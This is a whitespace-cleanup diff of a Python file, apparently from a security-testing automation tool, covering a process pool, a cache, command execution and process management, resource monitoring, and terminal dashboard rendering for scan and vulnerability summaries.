submit_task(self, task_id: str, func, *args, **kwargs) -> str: """Submit a task to the process pool""" task = { @@ -4911,14 +4911,14 @@ class ProcessPool: "submitted_at": time.time(), "status": "queued" } - + with self.pool_lock: self.active_tasks[task_id] = task self.task_queue.put(task) - + logger.info(f"๐Ÿ“‹ Task submitted to pool: {task_id}") return task_id - + def get_task_result(self, task_id: str) -> Dict[str, Any]: """Get result of a submitted task""" with self.pool_lock: @@ -4928,32 +4928,32 @@ class ProcessPool: return {"status": self.active_tasks[task_id]["status"], "result": None} else: return {"status": "not_found", "result": None} - + def _worker_thread(self, worker_id: int): """Worker thread that processes tasks""" logger.info(f"๐Ÿ”ง Process pool worker {worker_id} started") - + while True: try: # Get task from queue with timeout task = self.task_queue.get(timeout=30) if task is None: # Shutdown signal break - + task_id = task["id"] start_time = time.time() - + # Update task status with self.pool_lock: if task_id in self.active_tasks: self.active_tasks[task_id]["status"] = "running" self.active_tasks[task_id]["worker_id"] = worker_id self.active_tasks[task_id]["started_at"] = start_time - + try: # Execute task result = task["func"](*task["args"], **task["kwargs"]) - + # Store result execution_time = time.time() - start_time with self.pool_lock: @@ -4964,20 +4964,20 @@ class ProcessPool: "worker_id": worker_id, "completed_at": time.time() } - + # Update performance metrics self.performance_metrics["tasks_completed"] += 1 self.performance_metrics["avg_task_time"] = ( (self.performance_metrics["avg_task_time"] * (self.performance_metrics["tasks_completed"] - 1) + execution_time) / self.performance_metrics["tasks_completed"] ) - + # Remove from active tasks if task_id in self.active_tasks: del self.active_tasks[task_id] - + logger.info(f"โœ… Task completed: {task_id} in {execution_time:.2f}s") - + except Exception as e: # Handle task failure with self.pool_lock: @@ -4988,67 +4988,67 @@ class ProcessPool: "worker_id": worker_id, "failed_at": time.time() } - + self.performance_metrics["tasks_failed"] += 1 - + if task_id in self.active_tasks: del self.active_tasks[task_id] - + logger.error(f"โŒ Task failed: {task_id} - {str(e)}") - + self.task_queue.task_done() - + except queue.Empty: # No tasks available, continue waiting continue except Exception as e: logger.error(f"๐Ÿ’ฅ Worker {worker_id} error: {str(e)}") - + def _monitor_performance(self): """Monitor pool performance and auto-scale""" while True: try: time.sleep(10) # Monitor every 10 seconds - + with self.pool_lock: queue_size = self.task_queue.qsize() active_workers = len([w for w in self.workers if w.is_alive()]) active_tasks_count = len(self.active_tasks) - + # Calculate load metrics if active_workers > 0: load_ratio = (active_tasks_count + queue_size) / active_workers else: load_ratio = float('inf') - + # Auto-scaling logic if load_ratio > self.scale_threshold and active_workers < self.max_workers: # Scale up new_workers = min(2, self.max_workers - active_workers) self._scale_up(new_workers) logger.info(f"๐Ÿ“ˆ Scaled up process pool: +{new_workers} workers (total: {active_workers + new_workers})") - + elif load_ratio < 0.3 and active_workers > self.min_workers: # Scale down workers_to_remove = min(1, active_workers - self.min_workers) self._scale_down(workers_to_remove) logger.info(f"๐Ÿ“‰ Scaled down process pool: -{workers_to_remove} workers (total: {active_workers - workers_to_remove})") - + # Update performance metrics try: cpu_percent = psutil.cpu_percent() memory_info = psutil.virtual_memory() - + with self.pool_lock: self.performance_metrics["cpu_usage"] = cpu_percent self.performance_metrics["memory_usage"] = memory_info.percent - + except Exception: pass # Ignore psutil errors - + except Exception as e: logger.error(f"๐Ÿ’ฅ Pool monitor error: {str(e)}") - + def _scale_up(self, count: int): """Add workers to the pool""" with self.pool_lock: @@ -5057,7 +5057,7 @@ class ProcessPool: worker = threading.Thread(target=self._worker_thread, args=(worker_id,), daemon=True) worker.start() self.workers.append(worker) - + def _scale_down(self, count: int): """Remove workers from the pool""" with self.pool_lock: @@ -5068,7 +5068,7 @@ class ProcessPool: # Remove from workers list (worker will exit naturally) if self.workers: self.workers.pop() - + def get_pool_stats(self) -> Dict[str, Any]: """Get current pool statistics""" with self.pool_lock: @@ -5084,7 +5084,7 @@ class ProcessPool: class AdvancedCache: """Advanced caching system with intelligent TTL and LRU eviction""" - + def __init__(self, max_size=1000, default_ttl=3600): self.max_size = max_size self.default_ttl = default_ttl @@ -5094,49 +5094,49 @@ class AdvancedCache: self.cache_lock = threading.RLock() self.hit_count = 0 self.miss_count = 0 - + # Start cleanup thread self.cleanup_thread = threading.Thread(target=self._cleanup_expired, daemon=True) self.cleanup_thread.start() - + def get(self, key: str) -> Any: """Get value from cache""" with self.cache_lock: current_time = time.time() - + # Check if key exists and is not expired if key in self.cache and (key not in self.ttl_times or self.ttl_times[key] > current_time): # Update access time for LRU self.access_times[key] = current_time self.hit_count += 1 return self.cache[key] - + # Cache miss or expired if key in self.cache: # Remove expired entry self._remove_key(key) - + self.miss_count += 1 return None - + def set(self, key: str, value: Any, ttl: int = None) -> None: """Set value in cache with optional TTL""" with self.cache_lock: current_time = time.time() - + # Use default TTL if not specified if ttl is None: ttl = self.default_ttl - + # Check if we need to evict entries if len(self.cache) >= self.max_size and key not in self.cache: self._evict_lru() - + # Set the value self.cache[key] = value self.access_times[key] = current_time self.ttl_times[key] = current_time + ttl - + def delete(self, key: str) -> bool: """Delete key from cache""" with self.cache_lock: @@ -5144,30 +5144,30 @@ class AdvancedCache: self._remove_key(key) return True return False - + def clear(self) -> None: """Clear all cache entries""" with self.cache_lock: self.cache.clear() self.access_times.clear() self.ttl_times.clear() - + def _remove_key(self, key: str) -> None: """Remove key and associated metadata""" self.cache.pop(key, None) self.access_times.pop(key, None) self.ttl_times.pop(key, None) - + def _evict_lru(self) -> None: """Evict least recently used entry""" if not self.access_times: return - + # Find least recently used key lru_key = min(self.access_times.keys(), key=lambda k: self.access_times[k]) self._remove_key(lru_key) logger.debug(f"๐Ÿ—‘๏ธ Evicted LRU cache entry: {lru_key}") - + def _cleanup_expired(self) -> None: """Cleanup expired entries periodically""" while True: @@ -5175,27 +5175,27 @@ class AdvancedCache: time.sleep(60) # Cleanup every minute current_time = time.time() expired_keys = [] - + with self.cache_lock: for key, expiry_time in self.ttl_times.items(): if expiry_time <= current_time: expired_keys.append(key) - + for key in expired_keys: self._remove_key(key) - + if expired_keys: logger.debug(f"๐Ÿงน Cleaned up {len(expired_keys)} expired cache entries") - + except Exception as e: logger.error(f"๐Ÿ’ฅ Cache cleanup error: {str(e)}") - + def get_stats(self) -> Dict[str, Any]: """Get cache statistics""" with self.cache_lock: total_requests = self.hit_count + self.miss_count hit_rate = (self.hit_count / total_requests * 100) if total_requests > 0 else 0 - + return { "size": len(self.cache), "max_size": self.max_size, @@ -5207,7 +5207,7 @@ class AdvancedCache: class EnhancedProcessManager: """Advanced process management with intelligent resource allocation""" - + def __init__(self): self.process_pool = ProcessPool(min_workers=4, max_workers=32) self.cache = AdvancedCache(max_size=2000, default_ttl=1800) # 30 minutes default TTL @@ -5215,11 +5215,11 @@ class EnhancedProcessManager: self.process_registry = {} self.registry_lock = threading.RLock() self.performance_dashboard = PerformanceDashboard() - + # Process termination and recovery self.termination_handlers = {} self.recovery_strategies = {} - + # Auto-scaling configuration self.auto_scaling_enabled = True self.resource_thresholds = { @@ -5228,22 +5228,22 @@ class EnhancedProcessManager: "disk_high": 95.0, "load_high": 0.8 } - + # Start background monitoring self.monitor_thread = threading.Thread(target=self._monitor_system, daemon=True) self.monitor_thread.start() - + def execute_command_async(self, command: str, context: Dict[str, Any] = None) -> str: """Execute command asynchronously using process pool""" task_id = f"cmd_{int(time.time() * 1000)}_{hash(command) % 10000}" - + # Check cache first cache_key = f"cmd_result_{hash(command)}" cached_result = self.cache.get(cache_key) if cached_result and context and context.get("use_cache", True): logger.info(f"๐Ÿ“‹ Using cached result for command: {command[:50]}...") return cached_result - + # Submit to process pool self.process_pool.submit_task( task_id, @@ -5251,23 +5251,23 @@ class EnhancedProcessManager: command, context or {} ) - + return task_id - + def _execute_command_internal(self, command: str, context: Dict[str, Any]) -> Dict[str, Any]: """Internal command execution with enhanced monitoring""" start_time = time.time() - + try: # Resource-aware execution resource_usage = self.resource_monitor.get_current_usage() - + # Adjust command based on resource availability if resource_usage["cpu_percent"] > self.resource_thresholds["cpu_high"]: # Add nice priority for CPU-intensive commands if not command.startswith("nice"): command = f"nice -n 10 {command}" - + # Execute command process = subprocess.Popen( command, @@ -5277,7 +5277,7 @@ class EnhancedProcessManager: text=True, preexec_fn=os.setsid if os.name != 'nt' else None ) - + # Register process with self.registry_lock: self.process_registry[process.pid] = { @@ -5287,11 +5287,11 @@ class EnhancedProcessManager: "context": context, "status": "running" } - + # Monitor process execution stdout, stderr = process.communicate() execution_time = time.time() - start_time - + result = { "success": process.returncode == 0, "stdout": stdout, @@ -5301,18 +5301,18 @@ class EnhancedProcessManager: "pid": process.pid, "resource_usage": self.resource_monitor.get_process_usage(process.pid) } - + # Cache successful results if result["success"] and context.get("cache_result", True): cache_key = f"cmd_result_{hash(command)}" cache_ttl = context.get("cache_ttl", 1800) # 30 minutes default self.cache.set(cache_key, result, cache_ttl) - + # Update performance metrics self.performance_dashboard.record_execution(command, result) - + return result - + except Exception as e: execution_time = time.time() - start_time error_result = { @@ -5323,33 +5323,33 @@ class EnhancedProcessManager: "execution_time": execution_time, "error": str(e) } - + self.performance_dashboard.record_execution(command, error_result) return error_result - + finally: # Cleanup process registry with self.registry_lock: if hasattr(process, 'pid') and process.pid in self.process_registry: del self.process_registry[process.pid] - + def get_task_result(self, task_id: str) -> Dict[str, Any]: """Get result of async task""" return self.process_pool.get_task_result(task_id) - + def terminate_process_gracefully(self, pid: int, timeout: int = 30) -> bool: """Terminate process with graceful degradation""" try: with self.registry_lock: if pid not in self.process_registry: return False - + process_info = self.process_registry[pid] process = process_info["process"] - + # Try graceful termination first process.terminate() - + # Wait for graceful termination try: process.wait(timeout=timeout) @@ -5362,52 +5362,52 @@ class EnhancedProcessManager: process_info["status"] = "force_killed" logger.warning(f"โš ๏ธ Process {pid} force killed after timeout") return True - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return False - + def _monitor_system(self): """Monitor system resources and auto-scale""" while True: try: time.sleep(15) # Monitor every 15 seconds - + # Get current resource usage resource_usage = self.resource_monitor.get_current_usage() - + # Auto-scaling based on resource usage if self.auto_scaling_enabled: self._auto_scale_based_on_resources(resource_usage) - + # Update performance dashboard self.performance_dashboard.update_system_metrics(resource_usage) - + except Exception as e: logger.error(f"๐Ÿ’ฅ System monitoring error: {str(e)}") - + def _auto_scale_based_on_resources(self, resource_usage: Dict[str, float]): """Auto-scale process pool based on resource usage""" pool_stats = self.process_pool.get_pool_stats() current_workers = pool_stats["active_workers"] - + # Scale down if resources are constrained if (resource_usage["cpu_percent"] > self.resource_thresholds["cpu_high"] or resource_usage["memory_percent"] > self.resource_thresholds["memory_high"]): - + if current_workers > self.process_pool.min_workers: self.process_pool._scale_down(1) logger.info(f"๐Ÿ“‰ Auto-scaled down due to high resource usage: CPU {resource_usage['cpu_percent']:.1f}%, Memory {resource_usage['memory_percent']:.1f}%") - + # Scale up if resources are available and there's demand - elif (resource_usage["cpu_percent"] < 60 and + elif (resource_usage["cpu_percent"] < 60 and resource_usage["memory_percent"] < 70 and pool_stats["queue_size"] > 2): - + if current_workers < self.process_pool.max_workers: self.process_pool._scale_up(1) logger.info(f"๐Ÿ“ˆ Auto-scaled up due to available resources and demand") - + def get_comprehensive_stats(self) -> Dict[str, Any]: """Get comprehensive system and process statistics""" return { @@ -5422,12 +5422,12 @@ class EnhancedProcessManager: class ResourceMonitor: """Advanced resource monitoring with historical tracking""" - + def __init__(self, history_size=100): self.history_size = history_size self.usage_history = [] self.history_lock = threading.Lock() - + def get_current_usage(self) -> Dict[str, float]: """Get current system resource usage""" try: @@ -5435,7 +5435,7 @@ class ResourceMonitor: memory = psutil.virtual_memory() disk = psutil.disk_usage('/') network = psutil.net_io_counters() - + usage = { "cpu_percent": cpu_percent, "memory_percent": memory.percent, @@ -5446,15 +5446,15 @@ class ResourceMonitor: "network_bytes_recv": network.bytes_recv, "timestamp": time.time() } - + # Add to history with self.history_lock: self.usage_history.append(usage) if len(self.usage_history) > self.history_size: self.usage_history.pop(0) - + return usage - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting resource usage: {str(e)}") return { @@ -5467,7 +5467,7 @@ class ResourceMonitor: "network_bytes_recv": 0, "timestamp": time.time() } - + def get_process_usage(self, pid: int) -> Dict[str, Any]: """Get resource usage for specific process""" try: @@ -5481,18 +5481,18 @@ class ResourceMonitor: } except (psutil.NoSuchProcess, psutil.AccessDenied): return {} - + def get_usage_trends(self) -> Dict[str, Any]: """Get resource usage trends""" with self.history_lock: if len(self.usage_history) < 2: return {} - + recent = self.usage_history[-10:] # Last 10 measurements - + cpu_trend = sum(u["cpu_percent"] for u in recent) / len(recent) memory_trend = sum(u["memory_percent"] for u in recent) / len(recent) - + return { "cpu_avg_10": cpu_trend, "memory_avg_10": memory_trend, @@ -5502,13 +5502,13 @@ class ResourceMonitor: class PerformanceDashboard: """Real-time performance monitoring dashboard""" - + def __init__(self): self.execution_history = [] self.system_metrics = [] self.dashboard_lock = threading.Lock() self.max_history = 1000 - + def record_execution(self, command: str, result: Dict[str, Any]): """Record command execution for performance tracking""" with self.dashboard_lock: @@ -5519,30 +5519,30 @@ class PerformanceDashboard: "return_code": result.get("return_code", -1), "timestamp": time.time() } - + self.execution_history.append(execution_record) if len(self.execution_history) > self.max_history: self.execution_history.pop(0) - + def update_system_metrics(self, metrics: Dict[str, Any]): """Update system metrics for dashboard""" with self.dashboard_lock: self.system_metrics.append(metrics) if len(self.system_metrics) > self.max_history: self.system_metrics.pop(0) - + def get_summary(self) -> Dict[str, Any]: """Get performance summary""" with self.dashboard_lock: if not self.execution_history: return {"executions": 0} - + recent_executions = self.execution_history[-100:] # Last 100 executions - + total_executions = len(recent_executions) successful_executions = sum(1 for e in recent_executions if e["success"]) avg_execution_time = sum(e["execution_time"] for e in recent_executions) / total_executions - + return { "total_executions": len(self.execution_history), "recent_executions": total_executions, @@ -5575,7 +5575,7 @@ process_lock = threading.Lock() class ProcessManager: """Enhanced process manager for command termination and monitoring""" - + @staticmethod def register_process(pid, command, process_obj): """Register a new active process""" @@ -5591,7 +5591,7 @@ class ProcessManager: "bytes_processed": 0 } logger.info(f"๐Ÿ†” REGISTERED: Process {pid} - {command[:50]}...") - + @staticmethod def update_process_progress(pid, progress, last_output="", bytes_processed=0): """Update process progress and stats""" @@ -5601,15 +5601,15 @@ class ProcessManager: active_processes[pid]["last_output"] = last_output active_processes[pid]["bytes_processed"] = bytes_processed runtime = time.time() - active_processes[pid]["start_time"] - + # Calculate ETA if progress > 0 eta = 0 if progress > 0: eta = (runtime / progress) * (1.0 - progress) - + active_processes[pid]["runtime"] = runtime active_processes[pid]["eta"] = eta - + @staticmethod def terminate_process(pid): """Terminate a specific process""" @@ -5623,7 +5623,7 @@ class ProcessManager: time.sleep(1) # Give it a chance to terminate gracefully if process_obj.poll() is None: process_obj.kill() # Force kill if still running - + active_processes[pid]["status"] = "terminated" logger.warning(f"๐Ÿ›‘ TERMINATED: Process {pid} - {process_info['command'][:50]}...") return True @@ -5631,7 +5631,7 @@ class ProcessManager: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return False return False - + @staticmethod def cleanup_process(pid): """Remove process from active registry""" @@ -5641,19 +5641,19 @@ class ProcessManager: logger.info(f"๐Ÿงน CLEANUP: Process {pid} removed from registry") return process_info return None - + @staticmethod def get_process_status(pid): """Get status of a specific process""" with process_lock: return active_processes.get(pid, None) - + @staticmethod def list_active_processes(): """List all active processes""" with process_lock: return dict(active_processes) - + @staticmethod def pause_process(pid): """Pause a specific process (SIGSTOP)""" @@ -5669,7 +5669,7 @@ class ProcessManager: except Exception as e: logger.error(f"๐Ÿ’ฅ Error pausing process {pid}: {str(e)}") return False - + @staticmethod def resume_process(pid): """Resume a paused process (SIGCONT)""" @@ -5694,7 +5694,7 @@ class ProcessManager: BG_MAGENTA = '\033[45m' BG_CYAN = '\033[46m' BG_WHITE = '\033[47m' - + # Text effects DIM = '\033[2m' UNDERLINE = '\033[4m' @@ -5704,11 +5704,11 @@ class ProcessManager: class PythonEnvironmentManager: """Manage Python virtual environments and dependencies""" - + def __init__(self, base_dir: str = "/tmp/hexstrike_envs"): self.base_dir = Path(base_dir) self.base_dir.mkdir(exist_ok=True) - + def create_venv(self, env_name: str) -> Path: """Create a new virtual environment""" env_path = self.base_dir / env_name @@ -5716,14 +5716,14 @@ class PythonEnvironmentManager: logger.info(f"๐Ÿ Creating virtual environment: {env_name}") venv.create(env_path, with_pip=True) return env_path - + def install_package(self, env_name: str, package: str) -> bool: """Install a package in the specified environment""" env_path = self.create_venv(env_name) pip_path = env_path / "bin" / "pip" - + try: - result = subprocess.run([str(pip_path), "install", package], + result = subprocess.run([str(pip_path), "install", package], capture_output=True, text=True, timeout=300) if result.returncode == 0: logger.info(f"๐Ÿ“ฆ Installed package {package} in {env_name}") @@ -5734,7 +5734,7 @@ class PythonEnvironmentManager: except Exception as e: logger.error(f"๐Ÿ’ฅ Error installing package {package}: {e}") return False - + def get_python_path(self, env_name: str) -> str: """Get Python executable path for environment""" env_path = self.create_venv(env_name) @@ -5749,29 +5749,29 @@ env_manager = PythonEnvironmentManager() class CVEIntelligenceManager: """Advanced CVE Intelligence and Vulnerability Management System""" - + def __init__(self): self.cve_cache = {} self.vulnerability_db = {} self.threat_intelligence = {} - + @staticmethod def create_banner(): """Reuse unified ModernVisualEngine banner (legacy hook).""" return ModernVisualEngine.create_banner() - + @staticmethod - def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', + def render_progress_bar(progress: float, width: int = 40, style: str = 'cyber', label: str = "", eta: float = 0, speed: str = "") -> str: """Render a beautiful progress bar with multiple styles""" - + # Clamp progress between 0 and 1 progress = max(0.0, min(1.0, progress)) - + # Calculate filled and empty portions filled_width = int(width * progress) empty_width = width - filled_width - + # Style-specific rendering if style == 'cyber': filled_char = 'โ–ˆ'; empty_char = 'โ–‘' @@ -5789,47 +5789,47 @@ class CVEIntelligenceManager: filled_char = 'โ–ˆ'; empty_char = 'โ–‘' bar_color = ModernVisualEngine.COLORS['ACCENT_LINE'] progress_color = ModernVisualEngine.COLORS['PRIMARY_BORDER'] - + # Build the progress bar filled_part = bar_color + filled_char * filled_width empty_part = ModernVisualEngine.COLORS['TERMINAL_GRAY'] + empty_char * empty_width percentage = f"{progress * 100:.1f}%" - + # Add ETA and speed if provided eta_str = f" | ETA: {eta:.0f}s" if eta > 0 else "" speed_str = f" | {speed}" if speed else "" - + # Construct the full progress bar bar = f"{progress_color}[{filled_part}{empty_part}{ModernVisualEngine.COLORS['RESET']}{progress_color}] {percentage}{eta_str}{speed_str}{ModernVisualEngine.COLORS['RESET']}" - + if label: return f"{ModernVisualEngine.COLORS['BOLD']}{label}{ModernVisualEngine.COLORS['RESET']} {bar}" return bar - + @staticmethod def render_vulnerability_card(vuln_data: Dict[str, Any]) -> str: """Render vulnerability as a beautiful card with severity indicators""" - + severity = vuln_data.get('severity', 'info').lower() title = vuln_data.get('title', 'Unknown Vulnerability') url = vuln_data.get('url', 'N/A') description = vuln_data.get('description', 'No description available') cvss = vuln_data.get('cvss_score', 0.0) - + # Get severity color severity_color = ModernVisualEngine.COLORS['HACKER_RED'] if severity == 'critical' else ModernVisualEngine.COLORS['HACKER_RED'] if severity == 'high' else ModernVisualEngine.COLORS['CYBER_ORANGE'] if severity == 'medium' else ModernVisualEngine.COLORS['CYBER_ORANGE'] if severity == 'low' else ModernVisualEngine.COLORS['NEON_BLUE'] - + # Severity indicators severity_indicators = { 'critical': '๐Ÿ”ฅ CRITICAL', 'high': 'โš ๏ธ HIGH', - 'medium': '๐Ÿ“Š MEDIUM', + 'medium': '๐Ÿ“Š MEDIUM', 'low': '๐Ÿ“ LOW', 'info': 'โ„น๏ธ INFO' } - + severity_badge = severity_indicators.get(severity, 'โ“ UNKNOWN') - + # Create the vulnerability card card = f""" {ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} @@ -5842,27 +5842,27 @@ class CVEIntelligenceManager: {ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ return card - + @staticmethod def create_live_dashboard(processes: Dict[int, Dict[str, Any]]) -> str: """Create a live dashboard showing all active processes""" - + if not processes: return f"{ModernVisualEngine.COLORS['TERMINAL_GRAY']}๐Ÿ“Š No active processes{ModernVisualEngine.COLORS['RESET']}" - + dashboard = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•— โ•‘ ๐Ÿš€ LIVE PROCESS DASHBOARD โ•‘ โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ{ModernVisualEngine.COLORS['RESET']} """ - + for pid, proc_info in processes.items(): command = proc_info.get('command', 'Unknown')[:50] status = proc_info.get('status', 'unknown') progress = proc_info.get('progress', 0.0) runtime = proc_info.get('runtime', 0) eta = proc_info.get('eta', 0) - + # Status color coding status_colors = { 'running': ModernVisualEngine.COLORS['MATRIX_GREEN'], @@ -5871,39 +5871,39 @@ class CVEIntelligenceManager: 'completed': ModernVisualEngine.COLORS['NEON_BLUE'] } status_color = status_colors.get(status, ModernVisualEngine.COLORS['BRIGHT_WHITE']) - + # Create mini progress bar mini_bar = ModernVisualEngine.render_progress_bar( progress, width=20, style='cyber', eta=eta ) - + dashboard += f"""{ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['NEON_BLUE']}PID {pid}{ModernVisualEngine.COLORS['RESET']} โ”‚ {status_color}{status.upper()}{ModernVisualEngine.COLORS['RESET']} โ”‚ {runtime:.1f}s โ”‚ {command}... {ModernVisualEngine.COLORS['BOLD']}โ•‘{ModernVisualEngine.COLORS['RESET']} {mini_bar} {ModernVisualEngine.COLORS['BOLD']}โ• โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฃ{ModernVisualEngine.COLORS['RESET']} """ - + dashboard += f"{ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•{ModernVisualEngine.COLORS['RESET']}" - + return dashboard - + @staticmethod def format_tool_output(tool: str, output: str, success: bool = True) -> str: """Format tool output with syntax highlighting and structure""" - + # Get tool icon tool_icon = '๐Ÿ› ๏ธ' # Default tool icon - + # Status indicator status_icon = "โœ…" if success else "โŒ" status_color = ModernVisualEngine.COLORS['MATRIX_GREEN'] if success else ModernVisualEngine.COLORS['HACKER_RED'] - + # Format the output with structure formatted_output = f""" {ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€ {tool_icon} {tool.upper()} OUTPUT โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {status_color}{status_icon} Status: {'SUCCESS' if success else 'FAILED'}{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BOLD']}โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค{ModernVisualEngine.COLORS['RESET']} """ - + # Process output lines with syntax highlighting lines = output.split('\n') for line in lines[:20]: # Limit to first 20 lines for readability @@ -5917,24 +5917,24 @@ class CVEIntelligenceManager: formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['WARNING']}{line[:75]}{ModernVisualEngine.COLORS['RESET']}\n" else: formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['BRIGHT_WHITE']}{line[:75]}{ModernVisualEngine.COLORS['RESET']}\n" - + if len(lines) > 20: formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['TERMINAL_GRAY']}... ({len(lines) - 20} more lines truncated){ModernVisualEngine.COLORS['RESET']}\n" - + formatted_output += f"{ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']}" - + return formatted_output - + @staticmethod def create_summary_report(results: Dict[str, Any]) -> str: """Generate a beautiful summary report""" - + total_vulns = len(results.get('vulnerabilities', [])) critical_vulns = len([v for v in results.get('vulnerabilities', []) if v.get('severity') == 'critical']) high_vulns = len([v for v in results.get('vulnerabilities', []) if v.get('severity') == 'high']) execution_time = results.get('execution_time', 0) tools_used = results.get('tools_used', []) - + report = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•— โ•‘ ๐Ÿ“Š SCAN 